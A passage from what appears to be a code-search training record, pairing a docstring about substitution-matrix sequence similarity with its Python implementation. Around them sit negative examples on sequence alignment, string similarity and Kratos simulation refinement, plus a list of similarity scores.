obj_lss[iter] = obj_ls\n x_zs[iter] = x_z\n u_norms[iter] = u_norm\n times[iter] = timeit.default_timer() - start_time\n\n if x_z < solver_tol:\n break\n\n infos = {'obj_lss': obj_lss, 'x_zs': x_zs, 'u_norms': u_norms,\n 'times': times, 'alpha':alpha, 'lambda_l1':lambda_l1,\n 'max_iter':max_iter, 'solver_tol':solver_tol}\n\n\n return (x, z, u, infos)", "def ExecuteInstanceStochasticAdaptiveRefinementAux_Functionality(current_global_index,pickled_coarse_model,pickled_coarse_project_parameters,pickled_custom_metric_refinement_parameters,pickled_custom_remesh_refinement_parameters,random_variable,current_index,current_analysis_stage,previous_computational_time,open_mp_threads,mapping_flag,pickled_mapping_reference_model,print_to_file,filename):\n\n start_time = time.time()\n # unpickle model and build Kratos Model object\n serialized_model = pickle.loads(pickled_coarse_model)\n current_model = KratosMultiphysics.Model()\n serialized_model.Load(\"ModelSerialization\",current_model)\n del(serialized_model)\n # unpickle parameters and build Kratos Parameters object\n serialized_project_parameters = pickle.loads(pickled_coarse_project_parameters)\n current_project_parameters = KratosMultiphysics.Parameters()\n serialized_project_parameters.Load(\"ParametersSerialization\",current_project_parameters)\n del(serialized_project_parameters)\n # refine if current current_global_index > 0, adaptive refinement based on the solution of previous index\n if (current_index > 0):\n # unpickle metric and remesh refinement parameters and build Kratos Parameters objects\n serialized_custom_metric_refinement_parameters = pickle.loads(pickled_custom_metric_refinement_parameters)\n serialized_custom_remesh_refinement_parameters = pickle.loads(pickled_custom_remesh_refinement_parameters)\n current_custom_metric_refinement_parameters = KratosMultiphysics.Parameters()\n current_custom_remesh_refinement_parameters = KratosMultiphysics.Parameters()\n serialized_custom_metric_refinement_parameters.Load(\"MetricRefinementParametersSerialization\",current_custom_metric_refinement_parameters)\n serialized_custom_remesh_refinement_parameters.Load(\"RemeshRefinementParametersSerialization\",current_custom_remesh_refinement_parameters)\n del(serialized_custom_metric_refinement_parameters,serialized_custom_remesh_refinement_parameters)\n # refine the model Kratos object\n adaptive_refinement_manager = AdaptiveRefinement(current_index,current_model,current_project_parameters,current_custom_metric_refinement_parameters,current_custom_remesh_refinement_parameters)\n refined_model,refined_project_parameters = adaptive_refinement_manager.ComputeAdaptiveRefinement()\n current_model = refined_model\n del(refined_model,refined_project_parameters)\n # constructor analysis stage\n simulation = current_analysis_stage(current_model,current_project_parameters,random_variable)\n # add filename flag print_to_file is true\n if (print_to_file):\n simulation.filename = filename\n # add flag if current index is maximum index\n if (current_index == current_global_index):\n simulation.is_current_index_maximum_index = True\n else:\n simulation.is_current_index_maximum_index = False\n # mapping if in current finest level and mapping flag is true\n # otherwise standard behavior\n if (mapping_flag is True and current_index == current_global_index):\n # unpickle mapping reference model and build Kratos Model object\n serialized_mapping_reference_model = pickle.loads(pickled_mapping_reference_model)\n mapping_reference_model = KratosMultiphysics.Model()\n serialized_mapping_reference_model.Load(\"ModelSerialization\",mapping_reference_model)\n del(serialized_mapping_reference_model)\n # send reference model to analysis stage for mapping and set mapping flag to true\n simulation.mapping_reference_model = mapping_reference_model\n simulation.mapping = True\n simulation.Run()\n # mapping if in current finest level and mapping flag is true\n # otherwise standard qoi evaluation\n if (mapping_flag is True and current_index == current_global_index):\n qoi = simulation.MappingAndEvaluateQuantityOfInterest()\n else:\n qoi = simulation.EvaluateQuantityOfInterest()\n # save model and parameters as MpiSerializer Kratos objects\n serialized_finer_model = KratosMultiphysics.MpiSerializer()\n serialized_finer_model.Save(\"ModelSerialization\",simulation.model)\n # pickle model and parameters\n pickled_finer_model = pickle.dumps(serialized_finer_model, 2) # second argument is the protocol and is NECESSARY (according to pybind11 docs)\n del(simulation)\n end_time = time.time()\n computational_time = previous_computational_time + open_mp_threads*(end_time-start_time) # multiply by open mp threads to consider real machine cost\n return qoi,pickled_finer_model,computational_time", "def parallelized_threading(name, dico_aligns, dope_arr, index_aa):\n ev_threading = sc.Threading(dico_aligns[name])\n return (name, ev_threading.threaded(dope_arr, index_aa))", "def reduce_nb(a, reduce_func_nb, *args):\n out = np.full(a.shape[1], np.nan, dtype=np.float_)\n\n for col in range(a.shape[1]):\n out[col] = reduce_func_nb(col, a[:, col], *args)\n return out" ]
[ "0.65683377", "0.61231744", "0.61210066", "0.58272725", "0.58008033", "0.57025033", "0.56774867", "0.565421", "0.5610815", "0.5579183", "0.5561648", "0.5541063", "0.552428", "0.54533285", "0.5434301", "0.5418918", "0.5369601", "0.5330608", "0.52911884", "0.5281962", "0.5195514", "0.51942545", "0.5192588", "0.5172473", "0.5143275", "0.5107227", "0.5086616", "0.50838035", "0.50819606", "0.5070131", "0.50480384", "0.50349545", "0.5023571", "0.4985677", "0.49501696", "0.49332353", "0.489361", "0.4874437", "0.4874437", "0.48727936", "0.4854548", "0.48459977", "0.48438382", "0.4828254", "0.48235548", "0.4817116", "0.48142642", "0.48078787", "0.48063615", "0.47954836", "0.47952983", "0.4779901", "0.47657928", "0.47614145", "0.47402304", "0.47285813", "0.4727023", "0.47232905", "0.47220314", "0.47200912", "0.4702508", "0.4702322", "0.46876773", "0.4683725", "0.46806893", "0.46769854", "0.46747023", "0.46669236", "0.4656495", "0.4646575", "0.4645698", "0.4644609", "0.4640612", "0.46382976", "0.46382555", "0.46347043", "0.46222973", "0.4621476", "0.46167004", "0.46151206", "0.4613143", "0.4613047", "0.4610823", "0.46081734", "0.46072897", "0.4606967", "0.4606649", "0.46056393", "0.46050113", "0.45878655", "0.45859998", "0.45846683", "0.45830503", "0.45798513", "0.4577831", "0.4576468", "0.45697027", "0.45663613", "0.45614323", "0.4560821", "0.45588028" ]
0.0
-1
Computes sequence similarity based on the substitution matrix. Requires that sequences are prealigned and equal length. Operates on strings and a dict substitution matrix
def _nb_subst_metric(seq1, seq2, subst_dict, as_similarity=False): assert len(seq1) == len(seq2) def _sim_func(s1, s2, subst): sim12 = 0. for i in range(len(s1)): k1 = s1[i] + '|' + s2[i] k2 = s2[i] + '|' + s1[i] sim12 += subst.get(k1, subst.get(k2, subst['n|a'])) return sim12 """Site-wise similarity between seq1 and seq2 using the substitution matrix subst""" sim12 = _sim_func(seq1, seq2, subst_dict) if as_similarity: return sim12 else: L = len(seq1) sim11 = _sim_func(seq1, seq1, subst_dict) sim22 = _sim_func(seq2, seq2, subst_dict) D = sim11 + sim22 - 2 * sim12 return D
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def ComputeDistMatrix(dict_alignedSequences):\r\n \r\n # check if dictionary with keys as tuples containing integers and values as tuples containing strings\r\n check = True \r\n #1 Check Input is dict\r\n if isinstance(dict_alignedSequences, dict) == False:\r\n check = False\r\n \r\n #2 Check are the keys and values tuples. Do the keys only contain integers and the vlaues only strings\r\n i = 0\r\n while len(dict_alignedSequences) > i:\r\n #checking for keys and values as tuples\r\n if isinstance(list(dict_alignedSequences.keys())[i], tuple) == False or isinstance(list(dict_alignedSequences.values())[i], tuple) == False:\r\n check = False\r\n break\r\n #checking keys for integers\r\n if isinstance(list(dict_alignedSequences.keys())[i][0], int) == False or isinstance(list(dict_alignedSequences.keys())[i][1], int) == False:\r\n check = False\r\n break\r\n #checking values for strings\r\n if isinstance(list(dict_alignedSequences.values())[i][0], str) == False or isinstance(list(dict_alignedSequences.values())[i][1], str) == False:\r\n check = False\r\n break\r\n \r\n #increment the counter for while loop\r\n i += 1\r\n \r\n #3 Check sequences contain aligned DNA and are of equal length\r\n for key in dict_alignedSequences:\r\n if is_aligned_dna(dict_alignedSequences[key][0]) == False or is_aligned_dna(dict_alignedSequences[key][1]) == False:\r\n check = False\r\n break\r\n if len(dict_alignedSequences[key][0]) != len(dict_alignedSequences[key][1]):\r\n check = False\r\n break\r\n \r\n #final evalauation if data is usable\r\n if check == False:\r\n raise TypeError ('malformed input')\r\n \r\n #get number of sequences\r\n matrixdim = howmany_sequences(dict_alignedSequences)\r\n #initialize dist matrix\r\n distMatrix = init_Dist_Matrix(matrixdim)\r\n \r\n \r\n for i in dict_alignedSequences.keys():\r\n # useing the key i to get the corisponding aligned sequences \r\n seq = dict_alignedSequences[i]\r\n #calculate distances between the sequences\r\n distance = calculate_distance(seq[0],seq[1])\r\n #markdown result at the corrsiponding place in the distmatrix\r\n distMatrix[i[0]][i[1]] = distance\r\n distMatrix[i[1]][i[0]] = distance\r\n \r\n return(distMatrix)", "def seq_align(string1,string2,mismatch_penalty,gap_penalty):\n\n # define 2x2 matrix\n matrix = []\n for i in range(len(string1)+1):\n if i == 0:\n matrix.append(list([gap_penalty * x for x in range(len(string2)+1)]))\n else:\n matrix.append(list([gap_penalty * i if x == 0 else None for x in range(len(string2)+1)]))\n\n # populate matrix by looping through the strings and finding optimal value for each spot\n for i in range(len(string1)):\n for j in range(len(string2)):\n if string1[i] == string2[j]:\n val1 = 0 + matrix[i][j]\n else:\n val1 = mismatch_penalty + matrix[i][j]\n val2 = gap_penalty + matrix[i][j+1]\n val3 = gap_penalty + matrix[i+1][j]\n min_val = min(val1,val2,val3)\n matrix[i+1][j+1] = min_val\n\n\n # define values to use while retracing\n result_str1 = ''\n result_str2 = ''\n i = len(matrix)-1\n j = len(matrix[0])-1\n\n # trace through matrix to find the optimal character alignment\n while i > 0 and j > 0:\n val1 = matrix[i-1][j-1]\n val2 = matrix[i-1][j]\n val3 = matrix[i][j-1]\n min_val = min(val1,val2,val3)\n if val1 == min_val:\n result_str1 += string1[i-1]\n result_str2 += string2[j-1]\n i -= 1\n j -= 1\n elif val2 == min_val:\n result_str1 += \"-\"\n result_str2 += string2[j-1]\n i -= 1\n else:\n result_str1 += string1[i-1]\n result_str2 += \"-\"\n j -= 1\n\n # for any leftover j values\n if i == 0:\n while j > 0:\n result_str1 += '-'\n result_str2 += string2[j]\n j -=1\n\n # for any leftover i values\n if j == 0:\n while i > 0:\n result_str1 += string1[i]\n result_str2 += \"-\"\n i -= 1\n\n return matrix[len(matrix)-1][len(matrix[0])-1], result_str1[::-1], result_str2[::-1]", "def affine(s1, s2):\n if s1 is None or s2 is None:\n return np.NaN\n if pd.isnull(s1) or pd.isnull(s2):\n return np.NaN\n\n # Create the similarity measure object\n measure = sm.Affine()\n\n # if not isinstance(s1, six.string_types):\n # s1 = six.u(str(s1))\n #\n # if isinstance(s1, bytes):\n # s1 = s1.decode('utf-8', 'ignore')\n #\n # if not isinstance(s2, six.string_types):\n # s2 = six.u(str(s2))\n #\n # if isinstance(s2, bytes):\n # s2 = s2.decode('utf-8', 'ignore')\n\n s1 = gh.convert_to_str_unicode(s1)\n s2 = gh.convert_to_str_unicode(s2)\n\n # Call the function to compute the similarity\n return measure.get_raw_score(s1, s2)", "def optimal_string_alignment_similarity(s1, s2):\n max_cost = max(len(s1), len(s2))\n\n if max_cost == 0:\n return 1.0\n\n return 1.0 - float(optimal_string_alignment_distance(s1, s2)) / max_cost", "def string_similarity(a, b):\n return SequenceMatcher(a=a, b=b).ratio()", "def string_similarity(item_1, item_2):\n return SequenceMatcher(None, item_1.lower(), item_2.lower()).ratio()", "def distance_matrix(sequences, substitution_mat):\n distance_mat = numpy.empty((len(sequences), len(sequences)), dtype='float')\n\n print(\"Building distance matrix\")\n # Get similarity score\n for i, seqA in enumerate(sequences):\n sys.stdout.write(\"\\r%.f%%\" % (float(i+1)/len(sequences)*100))\n sys.stdout.flush()\n for j, seqB in enumerate(sequences[i:], start=i):\n score = substitution_score(substitution_mat, seqA, seqB)\n distance_mat[i, j] = score\n distance_mat[j, i] = score\n print(\"\")\n # Set equal the diagonal\n diag_mini = numpy.min(distance_mat.diagonal())\n for i in range(len(sequences)):\n distance_mat[i, i] = diag_mini\n # Convert similarity score into a distance\n mini = numpy.min(distance_mat)\n maxi = numpy.max(distance_mat)\n return 1 - (distance_mat + abs(mini))/(maxi - mini)", "def wordSimilarityRatio(sent_1,sent_2):", "def string_similarity_score(left: str, right: str):\n return SequenceMatcher(None, left, right).ratio()", "def similarity_transformation(rot, mat):\n return np.dot(rot, np.dot(mat, np.linalg.inv(rot)))", "def similarity_transformation(rot, mat):\n return np.dot(rot, np.dot(mat, np.linalg.inv(rot)))", "def sequence_align(string_v, string_w):\n m = len(string_v)\n n = len(string_w)\n\n # Initialization; D[i][j][0] contains the max alignment score of the\n # ith prefix of v and the jth of w; D[i][j][1] contains the back pointer.\n D = [[(0, START) for _ in range(n + 1)] for _ in range(m + 1)]\n\n for i in range(1, m + 1):\n D[i][0] = (D[i - 1][0][0] + blosum['-', string_v[i - 1]], DELETE)\n\n for j in range(1, n + 1):\n D[0][j] = (D[0][j - 1][0] + blosum['-', string_w[j - 1]], INSERT)\n\n # Recurrence\n for i in range(1, m + 1):\n for j in range(1, n + 1):\n insert = D[i][j-1][0] + blosum['-', string_w[j - 1]]\n delete = D[i-1][j][0] + blosum[string_v[i - 1], '-']\n substitute = D[i-1][j-1][0] + blosum[string_v[i - 1], string_w[j - 1]]\n # Set D[i][j] to the max of the recurrences\n if insert > delete and insert > substitute:\n D[i][j] = (insert, INSERT)\n elif delete > substitute:\n D[i][j] = (delete, DELETE)\n else:\n D[i][j] = (substitute, SUBSTITUTE)\n\n i, j = m, n\n v_aligned = ''\n w_aligned = ''\n back_pointer = D[i][j][1]\n while back_pointer != START:\n if back_pointer == INSERT:\n j -= 1\n v_aligned = '-' + v_aligned\n w_aligned = string_w[j] + w_aligned\n\n \n elif back_pointer == DELETE:\n i -= 1\n v_aligned = string_v[i] + v_aligned\n w_aligned = '-' + w_aligned\n\n elif back_pointer == SUBSTITUTE:\n i -= 1\n j -= 1\n v_aligned = string_v[i] + v_aligned\n w_aligned = string_w[j] + w_aligned\n\n \n back_pointer = D[i][j][1]\n \n return v_aligned, w_aligned", "def test_similarity(self):\n self.assertTrue(np.allclose(self.vectors.similarity('dog.n.01', 'dog.n.01'), 1))\n self.assertTrue(np.allclose(self.vectors.similarity('dog.n.01', 'mammal.n.01'), 0.180901358))", "def rs1_score(sequence):\n import math\n import numpy as np\n seq = str(sequence).upper()\n seq = list(seq)\n matrix1 = np.zeros([len(sequence),4], dtype=int)\n for i,item in enumerate(sequence):\n if item == 'A':\n matrix1[i,0] = 1\n if item == 'T':\n matrix1[i,1] = 1\n if item == 'U':\n matrix1[i,1] = 1\n if item == 'C':\n matrix1[i,2] = 1\n if item == 'G':\n matrix1[i,3] = 1\n\n\n \"\"\"\n Generates a binary matrix for DNA/RNA sequence, where each column is a possible\n pair of adjacent bases, and each row is a position along the sequence.\n Matrix column order is AA, AT, AC, AG, TA, TT, TC, TG, CA, CT, CC, CG, GA, GT, GC, GG\n \"\"\"\n sequence = sequence.replace('U','T')\n pairwise_sequence = []\n for i in range(len(sequence)):\n if i < len(sequence)-1:\n basepair = sequence[i]+sequence[i+1]\n pairwise_sequence.append(basepair)\n matrix2 = np.zeros([len(pairwise_sequence),16], dtype=int)\n for i,item in enumerate(pairwise_sequence):\n if item == 'AA':\n matrix2[i,0] = 1\n if item == 'AT':\n matrix2[i,1] = 1\n if item == 'AC':\n matrix2[i,2] = 1\n if item == 'AG':\n matrix2[i,3] = 1\n if item == 'TA':\n matrix2[i,4] = 1\n if item == 'TT':\n matrix2[i,5] = 1\n if item == 'TC':\n matrix2[i,6] = 1\n if item == 'TG':\n matrix2[i,7] = 1\n if item == 'CA':\n matrix2[i,8] = 1\n if item == 'CT':\n matrix2[i,9] = 1\n if item == 'CC':\n matrix2[i,10] = 1\n if item == 'CG':\n matrix2[i,11] = 1\n if item == 'GA':\n matrix2[i,12] = 1\n if item == 'GT':\n matrix2[i,13] = 1\n if item == 'GC':\n matrix2[i,14] = 1\n if item == 'GG':\n matrix2[i,15] = 1\n\n\n \"\"\"\n Scoring matrix\n \"\"\"\n intersect = 0.59763615\n low_gc = -0.2026259\n high_gc = -0.1665878\n\n first_order = ['G02','A03','C03','C04','C05',\n 'G05','A06','C06','C07','G07',\n 'A12','A15','C15','A16','C16',\n 'T16','A17','G17','C18','G18',\n 'A19','C19','G20','T20','G21',\n 'T21','C22','T22','T23','C24',\n 'G24','T24','A25','C25','T25',\n 'G28','T28','C29','G30']\n first_scores = [-0.2753771,-0.3238875,0.17212887,-0.1006662,-0.2018029,\n 0.24595663,0.03644004,0.09837684,-0.7411813,-0.3932644,\n -0.466099,0.08537695,-0.013814,0.27262051,0.1190226,\n -0.2859442,0.09745459,-0.1755462,-0.3457955,-0.6780964,\n 0.22508903,-0.5077941,-0.4173736,-0.054307,0.37989937,\n -0.0907126,0.05782332,-0.5305673,-0.8770074,-0.8762358,\n 0.27891626,-0.4031022,-0.0773007,0.28793562,-0.2216372,\n -0.6890167,0.11787758,-0.1604453,0.38634258]\n first_order_scores = dict(zip(first_order,first_scores))\n\n second_order = ['GT02','GC05','AA06','TA06','GG07',\n 'GG12','TA12','TC12','TT12','GG13',\n 'GA14','GC14','TG17','GG19','TC19',\n 'CC20','TG20','AC21','CG21','GA21',\n 'GG21','TC22','CG23','CT23','AA24',\n 'AG24','AG25','CG25','TG25','GT27',\n 'GG29']\n second_scores = [-0.6257787,0.30004332,-0.8348362,0.76062777,-0.4908167,\n -1.5169074,0.7092612,0.49629861,-0.5868739,-0.3345637,\n 0.76384993,-0.5370252,-0.7981461,-0.6668087,0.35318325,\n 0.74807209,-0.3672668,0.56820913,0.32907207,-0.8364568,\n -0.7822076,-1.029693,0.85619782,-0.4632077,-0.5794924,\n 0.64907554,-0.0773007,0.28793562,-0.2216372,0.11787758,\n -0.69774]\n second_order_scores = dict(zip(second_order,second_scores))\n\n\n # order 1 score matrix\n \"\"\" row order == A T/U C G \"\"\"\n first_matrix = np.zeros([4,30], dtype=float)\n def posit(key):\n return int(key[1:])-1\n for k,v in first_order_scores.items():\n if k[0] == 'A':\n first_matrix[0,posit(k)] = v\n elif k[0] == 'T':\n first_matrix[1,posit(k)] = v\n elif k[0] == 'C':\n first_matrix[2,posit(k)] = v\n elif k[0] == 'G':\n first_matrix[3,posit(k)] = v\n\n\n # order 2 score matrix\n \"\"\" row order == AA AT AC AG TA TT TC TG CA CT CC CG GA GT GC GG \"\"\"\n second_matrix = np.zeros([16,29], dtype=float)\n for k,v in second_order_scores.items():\n if k[0:2] == 'AA':\n second_matrix[0,int(k[2:])-1] = v\n if k[0:2] == 'AT':\n second_matrix[1,int(k[2:])-1] = v\n if k[0:2] == 'AC':\n second_matrix[2,int(k[2:])-1] = v\n if k[0:2] == 'AG':\n second_matrix[3,int(k[2:])-1] = v\n if k[0:2] == 'TA':\n second_matrix[4,int(k[2:])-1] = v\n if k[0:2] == 'TT':\n second_matrix[5,int(k[2:])-1] = v\n if k[0:2] == 'TC':\n second_matrix[6,int(k[2:])-1] = v\n if k[0:2] == 'TG':\n second_matrix[7,int(k[2:])-1] = v\n if k[0:2] == 'CA':\n second_matrix[8,int(k[2:])-1] = v\n if k[0:2] == 'CT':\n second_matrix[9,int(k[2:])-1] = v\n if k[0:2] == 'CC':\n second_matrix[10,int(k[2:])-1] = v\n if k[0:2] == 'CG':\n second_matrix[11,int(k[2:])-1] = v\n if k[0:2] == 'GA':\n second_matrix[12,int(k[2:])-1] = v\n if k[0:2] == 'GT':\n second_matrix[13,int(k[2:])-1] = v\n if k[0:2] == 'GC':\n second_matrix[14,int(k[2:])-1] = v\n if k[0:2] == 'GG':\n second_matrix[15,int(k[2:])-1] = v\n\n item_gc = sequence[0][5:-5]\n gc_count = item_gc.count('G') + item_gc.count('C')\n if gc_count < 10:\n gc_score = low_gc\n else:\n gc_score = high_gc\n first_first = np.matmul(first_matrix,matrix1)\n score_first = np.trace(first_first)\n score_second = np.trace(np.matmul(second_matrix,matrix2))\n score = (1/(1 + math.exp(-(intersect + gc_score + score_first + score_second))))\n return score", "def word_rotator_similarity(x, y):\n return 1 - word_rotator_distance(x, y)", "def match_score(seq1, seq2):\n\n seq1 = get_sequence_string(seq1)\n seq2 = get_sequence_string(seq2)\n score = align.localxx(seq1, seq2)[0][2]\n return score", "def word_embedding_levenshtein(seq1, seq2, embeddings, average_distance, r=0.9, normalise=False):\n\tx1 = 1 + len(seq1)\n\tx2 = 1 + len(seq2)\n\n\talpha = r / ((1 - r) * average_distance)\n\n\t# Initialisation of the matrix\n\td = [] # Using Numpy structures for this is probably not more efficient\n\td.append(list(range(x2)))\n\tfor i in range(1, x1):\n\t\td.append([i] * x2)\n\n\t# Core of the algorithm\n\tfor i in range(1, x1):\n\t\tfor j in range(1, x2):\n\t\t\te1 = seq1[i-1]\n\t\t\te2 = seq2[j-1]\n\n\t\t\tif(e1 == e2): c = 0\n\t\t\telse:\n\t\t\t\tv1 = embeddings[e1]\n\t\t\t\tv2 = embeddings[e2]\n\n\t\t\t\tif((v1 is None) or (v2 is None)): c = 1\n\t\t\t\telse:\n\t\t\t\t\tdst = np.linalg.norm(v1 - v2) # Distance 2 (or L2 norm of the difference)\n\n\t\t\t\t\t# Now, we need a function increasing function mapping 0 to 0 and +inf to 1\n\t\t\t\t\tc = 1 - (1 / (1 + (alpha * dst)))\n\n\t\t\t\t\t#c /= r # If you uncomment this line, the cost of a substitution at distance `average_distance` will be 1 and substitutions might have higher cost, up to 1/r. This might be justified as long as `r` is above 0.5 (otherwise, some substitutions might be more expensive than an insertion followed by a deletion).\n\n\t\t\td[i][j] = min(\n\t\t\t\t(d[(i-1)][j] + 1), # Deletion of seq1[i]\n\t\t\t\t(d[i][(j-1)] + 1), # Insertion of seq2[j]\n\t\t\t\t(d[(i-1)][(j-1)] + c) # Substitution from seq1[i] to seq2[j]\n\t\t\t)\n\n\traw = d[-1][-1]\n\n\tif(normalise): return (raw / (len(seq1) + len(seq2)))\n\treturn raw", "def substitution_score(substitution_matrix, seqA, seqB):\n return sum(compute_score_by_position(substitution_matrix, seqA, seqB))", "def compute_similarity(self, seq_node, **kwargs):\n pass", "def matrix_score(sequence1: str, sequence2: str, matrix_str: str = BLOSUM62) -> int:\r\n score_matrix = _load_matrix(matrix_str)\r\n score = 0\r\n for amino1, amino2 in zip(sequence1, sequence2):\r\n try:\r\n current_score = score_matrix[amino1.upper()][amino2.upper()]\r\n score += current_score\r\n print(f'{amino1} <-> {amino2}: {current_score}')\r\n except KeyError:\r\n raise AminoAcidNotFoundError(f'Scoring matrix does not support scoring for: (\\'{amino1}\\', \\'{amino2}\\')')\r\n return score", "def lev_sim(s1, s2):\n\n if s1 is None or s2 is None:\n return np.NaN\n if pd.isnull(s1) or pd.isnull(s2):\n return np.NaN\n\n # Create the similarity measure object\n measure = sm.Levenshtein()\n\n s1 = gh.convert_to_str_unicode(s1)\n s2 = gh.convert_to_str_unicode(s2)\n\n # Call the function to compute the similarity measure\n return measure.get_sim_score(s1, s2)", "def semantic_similarity(self,sentence_1, sentence_2, info_content_norm):\n\t words_1 = sentence_1.getList_of_words()\n\t words_2 = sentence_2.getList_of_words()\n\t joint_words = set(words_1).union(set(words_2))\n\t vec_1 = self.semantic_vector(words_1, joint_words, info_content_norm)\n\t vec_2 = self.semantic_vector(words_2, joint_words, info_content_norm)\n\t return np.dot(vec_1, vec_2.T) / (np.linalg.norm(vec_1) * np.linalg.norm(vec_2))", "def test_sequence_dist_all_metrics(metric):\n unique_seqs = np.array([\"AAA\", \"ARA\", \"AFFFFFA\", \"FAFAFA\", \"FFF\"])\n seqs2 = np.array([\"RRR\", \"FAFA\", \"WWWWWWW\"])\n dist_mat = ir.ir_dist.sequence_dist(unique_seqs, metric=metric, cutoff=8, n_jobs=2)\n assert dist_mat.shape == (5, 5)\n\n dist_mat = ir.ir_dist.sequence_dist(\n unique_seqs, seqs2, metric=metric, cutoff=8, n_jobs=2\n )\n assert dist_mat.shape == (5, 3)", "def compute_similarity(self, text1, text2):\n\n text1_dist = self.predict(text1)[0]\n text2_dist = self.predict(text2)[0]\n return jensenshannon(text1_dist, text2_dist)", "def sequence(word1: str, word2: str) -> str:\r\n matrix = [[[0, [0, 0]] for x in range(len(word1) + 1)] for i in range(len(word2) + 1)]\r\n\r\n for i in range(1, len(word2) + 1):\r\n for j in range(1, len(word1) + 1):\r\n # compares every letter in\r\n if word2[i - 1] == word1[j - 1]:\r\n matrix[i][j][0] = 1 + matrix[i-1][j-1][0]\r\n matrix[i][j][1] = [i - 1, j - 1]\r\n else:\r\n if matrix[i - 1][j][0] > matrix[i][j - 1][0]:\r\n matrix[i][j][0] = matrix[i - 1][j][0]\r\n matrix[i][j][1] = [i - 1, j]\r\n else:\r\n matrix[i][j][0] = matrix[i][j - 1][0]\r\n matrix[i][j][1] = [i, j - 1]\r\n # the code below runs in order to extract the sequence. it starts at position (m,n)\r\n res = \"\"\r\n i = len(matrix) - 1\r\n j = len(matrix[0]) - 1\r\n while i and j != 0:\r\n if matrix[i][j][1] == [i - 1, j - 1]:\r\n res = word1[j - 1] + res\r\n i, j = matrix[i][j][1]\r\n return res", "def information_content_similarity(s1, s2):\n lemmas_sentence_1, tagged_sentence_1 = lemmatize_sentence(s1.lower())\n lemmas_sentence_2, tagged_sentence_2 = lemmatize_sentence(s2.lower())\n\n # Disambiguate words and create list of sysnsets \n synsets_sentence_1 = []\n for (lemma, word_tag) in zip(lemmas_sentence_1, tagged_sentence_1):\n synset = lesk(lemmas_sentence_1, lemma, wordnet_pos_code(word_tag[1]))\n if synset is not None:\n synsets_sentence_1.append(synset)\n else:\n found = wordnet.synsets(lemma, wordnet_pos_code(word_tag[1]))\n if len(found) > 0:\n synsets_sentence_1.append(found[0]) \n #print(\"Warn: lemma [%s] returned no disambiguation...using synset : %s\" % (lemma, found[0])) \n synsets_sentence_2 = []\n for (lemma, word_tag) in zip(lemmas_sentence_2, tagged_sentence_2):\n synset = lesk(lemmas_sentence_2, lemma, wordnet_pos_code(word_tag[1]))\n if synset is not None:\n synsets_sentence_2.append(synset)\n else:\n found = wordnet.synsets(lemma, wordnet_pos_code(word_tag[1]))\n if len(found) > 0:\n synsets_sentence_2.append(found[0]) \n #print(\"Warn: lemma [%s] returned no disambiguation...using synset : %s\" % (lemma, found[0])) \n\n score, count = 0.0, 0\n # For each word in the first sentence\n for synset in synsets_sentence_1:\n L = []\n for ss in synsets_sentence_2:\n try:\n L.append(synset.lin_similarity(ss, brown_ic))\n except:\n continue\n if L: \n best_score = max(L)\n score += best_score\n count += 1\n # Average the values\n if count > 0: score /= count\n return score", "def testSeqMatch(self): # - - - - - - - - - - - - - - - - - - - - - - - - -\n\n for pair in self.string_pairs:\n\n approx_str_value = stringcmp.seqmatch(pair[0],pair[1])\n\n assert (isinstance(approx_str_value,float)), \\\n '\"SeqMatch\" does not return a floating point number for: '+ \\\n str(pair)\n\n assert (approx_str_value >= 0.0), \\\n '\"SeqMatch\" returns a negative number for: '+str(pair)\n\n assert (approx_str_value <= 1.0), \\\n '\"SeqMatch\" returns a number larger than 1.0 for: '+str(pair)\n\n approx_str_value_1 = stringcmp.seqmatch(pair[0],pair[1])\n approx_str_value_2 = stringcmp.seqmatch(pair[1],pair[0])\n\n assert (approx_str_value_1 == approx_str_value_2), \\\n '\"SeqMatch\" returns different values for pair and swapped ' + \\\n 'pair: '+str(pair)+': '+str(approx_str_value_1)+', '+ \\\n str(approx_str_value_2)\n\n # Check for value 1.0 if the strings are the same\n #\n if (pair[0] == pair[1]):\n\n assert (approx_str_value == 1.0), \\\n '\"SeqMatch\" does not return 1.0 if strings are equal: '+ \\\n str(pair)", "def text_similarity(this_text, other_text, shingle_length=5, minhash_size=200, random_seed=5):\n this_shingles = ShingledText(this_text, random_seed=random_seed, shingle_length=shingle_length, minhash_size=minhash_size)\n other_shingles = ShingledText(other_text, random_seed=random_seed, shingle_length=shingle_length, minhash_size=minhash_size)\n return this_shingles.similarity(other_shingles)", "def mm_similarity(s1, s2):\n if filter(str.isalpha, s1) == filter(str.isalpha, s2):\n if len(s1) < len(s2):\n return float(len(s1)) / len(s2)\n else:\n return float(len(s2)) / len(s1)\n else:\n return 0.", "def lemma_similarity(lemmas_sm, lemmas_lg):\n total = 0\n for k, v in lemmas_sm.items():\n if k in lemmas_lg:\n total += v*lemmas_lg[k]\n return total", "def similarity(query,word_dict,dictionary,number_of_docs,id):\n similarity = 0.0\n scalar_leng = 0.0\n for term in query:\n if term in dictionary:\n similarity += word_dict[term][1]*imp(term,word_dict,number_of_docs,id)\n\n for term in dictionary:\n scalar_leng += imp(term, word_dict, number_of_docs, id) ** 2\n\n final_scalar_leng = math.sqrt(scalar_leng)\n similarity = similarity / final_scalar_leng\n #print(similarity)\n return similarity", "def compute_global_alignment(seq_x, seq_y, scoring_matrix, alignment_matrix):\n\n align_x = \"\"\n align_y = \"\"\n\n len_x = len(seq_x)\n len_y = len(seq_y)\n\n score = alignment_matrix[len_x][len_y]\n\n while len_x > 0 and len_y > 0:\n if alignment_matrix[len_x][len_y] == alignment_matrix[len_x -1][len_y - 1] + scoring_matrix[seq_x[len_x-1]][seq_y[len_y-1]]:\n align_x = seq_x[len_x-1] + align_x\n align_y = seq_y[len_y-1] + align_y\n len_x -= 1\n len_y -= 1\n elif alignment_matrix[len_x][len_y] == alignment_matrix[len_x -1][len_y] + scoring_matrix[seq_x[len_x-1]][\"-\"]:\n align_x = seq_x[len_x-1] + align_x\n align_y = \"-\" + align_y\n len_x -= 1\n else:\n align_x = \"-\" + align_x\n align_y = seq_y[len_y-1] + align_y\n len_y -= 1\n\n while len_x > 0:\n align_x = seq_x[len_x-1] + align_x\n align_y = \"-\" + align_y\n len_x -= 1\n\n while len_y > 0:\n align_x = \"-\" + align_x\n align_y = seq_y[len_y-1] + align_y\n len_y -= 1\n\n return (score, align_x, align_y)", "def simple_baseline_similarity(s1, s2):\n # Tokenize by sentences into words in lower case \n tokenized_sentence_1 = nltk.word_tokenize(s1.lower())\n tokenized_sentence_2 = nltk.word_tokenize(s2.lower())\n\n tagged_sentence_1 = pos_tag(tokenized_sentence_1) # [ 